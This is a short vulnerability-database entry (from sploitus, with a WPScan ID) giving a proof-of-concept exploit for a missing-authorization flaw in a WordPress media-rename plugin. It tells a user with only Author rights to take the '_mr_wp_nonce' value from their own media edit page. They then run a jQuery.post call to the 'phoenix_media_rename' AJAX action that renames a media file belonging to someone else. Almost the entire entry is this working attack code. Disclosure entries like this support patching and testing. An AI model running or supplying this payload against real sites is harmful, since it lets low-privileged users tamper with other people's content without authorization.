## https://sploitus.com/exploit?id=WPEX-ID:5F63D677-20F3-4FE0-BB90-048B6898E6CD
As an Author, go to the page to edit one of your own Media (ie /wp-admin/post.php?post=1993&action=edit, which contains the _mr_wp_nonce nonce) and run the below in the Web Developer console (564 being the ID of the media the edit, which does not belong to the Author)
jQuery.post(ajaxurl, {
action: 'phoenix_media_rename',
type: "",
_wpnonce: jQuery('#_mr_wp_nonce').attr('value'),
new_filename: "missingauthz",
post_id:564
})